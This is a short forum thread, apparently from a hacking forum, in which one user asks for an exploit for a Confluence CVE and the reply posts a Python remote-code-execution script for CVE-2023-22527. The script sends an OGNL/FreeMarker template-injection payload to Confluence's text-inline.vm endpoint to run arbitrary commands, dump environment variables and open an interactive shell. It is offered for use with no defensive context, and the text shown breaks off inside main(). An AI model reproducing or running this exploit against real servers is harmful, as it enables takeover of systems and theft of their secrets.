anyone have CVE-2023-22522 poc or exp?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Код:
import requests
import argparse
class exploit:
def __init__(self, url):
self.url = url
def rce(self, cmd='', header='Ret-rce'):
data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"'+cmd+'"}))\r\n'
r = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = {
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': str(len(data))
}
)
return r.text.split('<!DOCTYPE html>')[0].strip()
def get_env(self):
return self.rce(cmd='env')
def shell(self):
print('[DEBUG] Spawning semi-interactive shell ..')
while 1:
cmd = input('$ ')
result = self.rce(cmd)
print(result)
def parse_args():
parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')
parser.add_argument("-u",dest="url",type=str,required=False, help="Url")
parser.add_argument("-c",dest="command",type=str,required=False, default=None,help="Command")
parser.add_argument("-e",dest="env",action="store_true",required=False,default=False, help="Get environnement vars")
parser.add_argument("-i",dest="interactive",action="store_true",required=False,default=False, help="Interactive mod")
return parser.parse_args()
def main(args):
if args.command is None and not args.env and not args.interactive:
print('[ERROR] Please provide a command using -c option')
exp = exploit(url = args.url)
if args.env:
res = exp.get_env()
print(res)